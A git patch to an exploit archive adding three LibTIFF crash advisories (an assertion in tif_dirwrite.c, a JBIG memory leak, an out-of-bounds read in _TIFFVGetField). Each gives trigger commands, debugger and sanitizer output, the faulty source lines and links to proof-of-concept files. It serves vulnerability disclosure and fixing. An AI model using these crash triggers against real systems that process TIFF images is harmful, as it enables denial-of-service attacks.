From d3536f6bef47a6ba442a19752dedcf09a441f82f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 7 Jul 2017 05:01:20 +0000 Subject: [PATCH] DB: 2017-07-07 3 new exploits LibTIFF - 'tif_dirwrite.c' Denial of Service LibTIFF - 'tif_jbig.c' Denial of Service LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read --- files.csv | 3 ++ platforms/linux/dos/42299.txt | 87 +++++++++++++++++++++++++++++++++ platforms/linux/dos/42300.txt | 42 ++++++++++++++++ platforms/linux/dos/42301.txt | 91 +++++++++++++++++++++++++++++++++++ 4 files changed, 223 insertions(+) create mode 100755 platforms/linux/dos/42299.txt create mode 100755 platforms/linux/dos/42300.txt create mode 100755 platforms/linux/dos/42301.txt diff --git a/files.csv b/files.csv index 5898d9e89..4ec8ee70d 100644 --- a/files.csv +++ b/files.csv @@ -5605,6 +5605,9 @@ id,file,description,date,author,platform,type,port 42279,platforms/freebsd_x86/dos/42279.c,"FreeBSD - 'setrlimit' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0 42285,platforms/android/dos/42285.txt,"LG MRA58K - 'ASFParser::SetMetaData' Stack Overflow",2017-06-30,"Google Security Research",android,dos,0 42286,platforms/multiple/dos/42286.txt,"Google Chrome - Out-of-Bounds Access in RegExp Stubs",2017-06-30,"Google Security Research",multiple,dos,0 +42299,platforms/linux/dos/42299.txt,"LibTIFF - 'tif_dirwrite.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0 +42300,platforms/linux/dos/42300.txt,"LibTIFF - 'tif_jbig.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0 +42301,platforms/linux/dos/42301.txt,"LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read",2017-07-06,zhangtan,linux,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 diff --git a/platforms/linux/dos/42299.txt b/platforms/linux/dos/42299.txt new file mode 100755 index 000000000..64a7f13d4 --- /dev/null +++ b/platforms/linux/dos/42299.txt @@ -0,0 +1,87 @@ +Source: http://bugzilla.maptools.org/show_bug.cgi?id=2712 + +Triggered by "./tiffset POC1" + +$ ./tiffset POC1 +TIFFReadDirectory: Warning, Unknown field with tag 302 (0x12e) encountered. +TIFFReadDirectory: Warning, Unknown field with tag 61961 (0xf209) encountered. +poc3: AdobeDeflate compression support is not configured. +tiffset: tif_dirwrite.c:2127: int TIFFWriteDirectoryTagCheckedLong8Array(TIFF +*, uint32 *, TIFFDirEntry *, uint16, uint32, uint64 *): Assertion +`tif->tif_flags&TIFF_BIGTIFF' failed. +Aborted + +The gdb debugging information is listed below: +(gdb) set args POC1 +(gdb) r +... +(gdb) c +Continuing. +TIFFReadDirectory: Warning, Unknown field with tag 302 (0x12e) encountered. +TIFFReadDirectory: Warning, Unknown field with tag 61961 (0xf209) encountered. +poc2: AdobeDeflate compression support is not configured. + +Breakpoint 2, TIFFWriteDirectoryTagCheckedLong8Array (tif=, +ndir=, count=1, + value=0x615c20, dir=, tag=) at +tif_dirwrite.c:2127 +2127 assert(tif->tif_flags&TIFF_BIGTIFF); +(gdb) bt +#0 0x00007ffff746a428 in __GI_raise (sig=sig@entry=6) at +../sysdeps/unix/sysv/linux/raise.c:54 +#1 0x00007ffff746c02a in __GI_abort () at abort.c:89 +#2 0x00007ffff7462bd7 in __assert_fail_base (fmt=, + assertion=assertion@entry=0x7ffff7baf949 "tif->tif_flags&TIFF_BIGTIFF", + file=file@entry=0x7ffff7baf5c0 "tif_dirwrite.c", line=line@entry=2127, + function=function@entry=0x7ffff7baf8e2 "int +TIFFWriteDirectoryTagCheckedLong8Array(TIFF *, uint32 *, TIFFDirEntry *, +uint16, uint32, uint64 *)") at assert.c:92 +#3 0x00007ffff7462c82 in __GI___assert_fail (assertion=0x7ffff7baf949 +"tif->tif_flags&TIFF_BIGTIFF", + file=0x7ffff7baf5c0 "tif_dirwrite.c", line=2127, + function=0x7ffff7baf8e2 "int TIFFWriteDirectoryTagCheckedLong8Array(TIFF *, +uint32 *, TIFFDirEntry *, uint16, uint32, uint64 *)") at assert.c:101 +#4 0x00007ffff7b4e9cb in TIFFWriteDirectoryTagCheckedLong8Array (tif=0x615010, +ndir=, count=1, + value=0x615c20, dir=, tag=) at +tif_dirwrite.c:2127 +#5 TIFFWriteDirectoryTagLong8Array (count=1, value=0x615c20, tif=, ndir=, + dir=, tag=) at tif_dirwrite.c:1462 +#6 TIFFWriteDirectorySec (tif=, isimage=, +imagedone=, + pdiroff=) at tif_dirwrite.c:746 +#7 0x00007ffff7b4f6b5 in TIFFWriteDirectory (tif=0x615010) at +tif_dirwrite.c:184 +#8 TIFFRewriteDirectory (tif=) at tif_dirwrite.c:360 +#9 0x0000000000402bc7 in main (argc=, argv=) at +tiffset.c:344 + +Trigged in line tif_dirwrite.c:2127 at function +TIFFWriteDirectoryTagCheckedLong8Array() +2122 static int +2123 TIFFWriteDirectoryTagCheckedLong8Array(TIFF* tif, uint32* ndir, +TIFFDirEntry* dir, uint16 tag, uint32 count, uint64* value) +2124 { +2125 assert(count<0x20000000); +2126 assert(sizeof(uint64)==8); +2127 assert(tif->tif_flags&TIFF_BIGTIFF); +2128 if (tif->tif_flags&TIFF_SWAB) +2129 TIFFSwabArrayOfLong8(value,count); +2130 +return(TIFFWriteDirectoryTagData(tif,ndir,dir,tag,TIFF_LONG8,count,count*8,value)); +2131 } + +[note]: Tiffset sets the value of a TIFF header to a specified value.It will +modify the raw POC file,so you'd better make a backup file every time you are +going to run. + +Credits: + +This vulnerability is detected by team OWL337, with our custom fuzzer collAFL. +Please contact ganshuitao@gmail.com and chaoz@tsinghua.edu.cn if you need +more info about the team, the tool or the vulnerability. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42299.zip diff --git a/platforms/linux/dos/42300.txt b/platforms/linux/dos/42300.txt new file mode 100755 index 000000000..fb008abed --- /dev/null +++ b/platforms/linux/dos/42300.txt @@ -0,0 +1,42 @@ +Source: http://bugzilla.maptools.org/show_bug.cgi?id=2706 + +Triggered by “./tiff2ps $POC” or “./tiff2pdf $POC” + +Triggered by “./tiff2ps $POC” or “./tiff2pdf $POC” + +The asan debug information is below: + +$./tiff2ps $POC + + +================================================================= +==26627==ERROR: LeakSanitizer: detected memory leaks + +Direct leak of 1792 byte(s) in 7 object(s) allocated from: + #0 0x7f7c4f1a19aa in malloc +(/usr/lib/x86_64-linux-gnu/libasan.so.2+0x989aa) + #1 0x7f7c4dca72fd (/usr/lib/x86_64-linux-gnu/libjbig.so.0+0x12fd) + #2 0x3ea () + +Indirect leak of 170491316224 byte(s) in 223 object(s) allocated from: + #0 0x7f7c4f1a19aa in malloc +(/usr/lib/x86_64-linux-gnu/libasan.so.2+0x989aa) + #1 0x7f7c4dca72fd (/usr/lib/x86_64-linux-gnu/libjbig.so.0+0x12fd) + #2 0x3ea () + +SUMMARY: AddressSanitizer: 170491318016 byte(s) leaked in 230 allocation(s). + + +Affected version: +<=the Latest version (4.0.8) + + +Credits: + +This vulnerability is detected by team OWL337, with our custom fuzzer coll AFL. +Please contact ganshuitao@gmail.com and chaoz@tsinghua.edu.cn if you need more +info about the team, the tool or the vulnerability. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42300.zip diff --git a/platforms/linux/dos/42301.txt b/platforms/linux/dos/42301.txt new file mode 100755 index 000000000..1b7792913 --- /dev/null +++ b/platforms/linux/dos/42301.txt @@ -0,0 +1,91 @@ +Source: http://bugzilla.maptools.org/show_bug.cgi?id=2693 + +On 4.0.7: + +# tiffsplit $FILE + +==2007== Invalid read of size 4 +==2007== at 0x40CD1A: _TIFFVGetField (tif_dir.c:1072) +==2007== by 0x41B2C5: TIFFVGetField (tif_dir.c:1198) +==2007== by 0x41B2C5: TIFFGetField (tif_dir.c:1182) +==2007== by 0x404CCF: tiffcp (tiffsplit.c:220) +==2007== by 0x404CCF: main (tiffsplit.c:89) +==2007== Address 0x0 is not stack'd, malloc'd or (recently) free'd + +------- Comment #1 From zhangtan 2017-05-15 01:20:26 ------- + +The place of Out of bound read: + +ret_val = 0; +for (i = 0; i < td->td_customValueCount; i++) { + TIFFTagValue *tv = td->td_customValues + i; + +if (tv->info->field_tag != tag) + continue; + +------- Comment #2 From zhangtan 2017-05-15 01:29:10 ------- + +The place of Out of bound read: + +The 1072 line of tif_dir.c + +1068 ret_val = 0; +1069 for (i = 0; i < td->td_customValueCount; i++) { +1070 TIFFTagValue *tv = td->td_customValues + i; +1071 +1072 if (tv->info->field_tag != tag) +1073 continue; + +As tv increased in 1070, Out of bound read happened in 1072 when the pointer tv +was referenced. + +------- Comment #3 From zhangtan 2017-05-15 01:46:33 ------- + +PoC: + +Detailed information of the bug can be reproduced using the valgrind tool: + +# valgrind tiffsplit $File(the testcase in the attachment) + +Error Message: +==23520== Invalid read of size 4 +==23520== at 0x40CD1A: _TIFFVGetField (tif_dir.c:1072) +==23520== by 0x41B2C5: TIFFVGetField (tif_dir.c:1198) +==23520== by 0x41B2C5: TIFFGetField (tif_dir.c:1182) +==23520== by 0x404CCF: tiffcp (tiffsplit.c:220) +==23520== by 0x404CCF: main (tiffsplit.c:89) +==23520== Address 0x0 is not stack'd, malloc'd or (recently) free'd +==23520== +==23520== +==23520== Process terminating with default action of signal 11 (SIGSEGV) +==23520== Access not within mapped region at address 0x0 +==23520== at 0x40CD1A: _TIFFVGetField (tif_dir.c:1072) +==23520== by 0x41B2C5: TIFFVGetField (tif_dir.c:1198) +==23520== by 0x41B2C5: TIFFGetField (tif_dir.c:1182) +==23520== by 0x404CCF: tiffcp (tiffsplit.c:220) +==23520== by 0x404CCF: main (tiffsplit.c:89) +==23520== If you believe this happened as a result of a stack +==23520== overflow in your program's main thread (unlikely but +==23520== possible), you can try to increase the size of the +==23520== main thread stack using the --main-stacksize= flag. +==23520== The main thread stack size used in this run was 8388608. +==23520== +==23520== HEAP SUMMARY: +==23520== in use at exit: 17,821 bytes in 42 blocks +==23520== total heap usage: 96 allocs, 54 frees, 59,223 bytes allocated +==23520== +==23520== LEAK SUMMARY: +==23520== definitely lost: 0 bytes in 0 blocks +==23520== indirectly lost: 0 bytes in 0 blocks +==23520== possibly lost: 0 bytes in 0 blocks +==23520== still reachable: 17,821 bytes in 42 blocks +==23520== suppressed: 0 bytes in 0 blocks +==23520== Rerun with --leak-check=full to see details of leaked memory +==23520== +==23520== For counts of detected and suppressed errors, rerun with: -v +==23520== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) +Segmentation fault + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42301.zip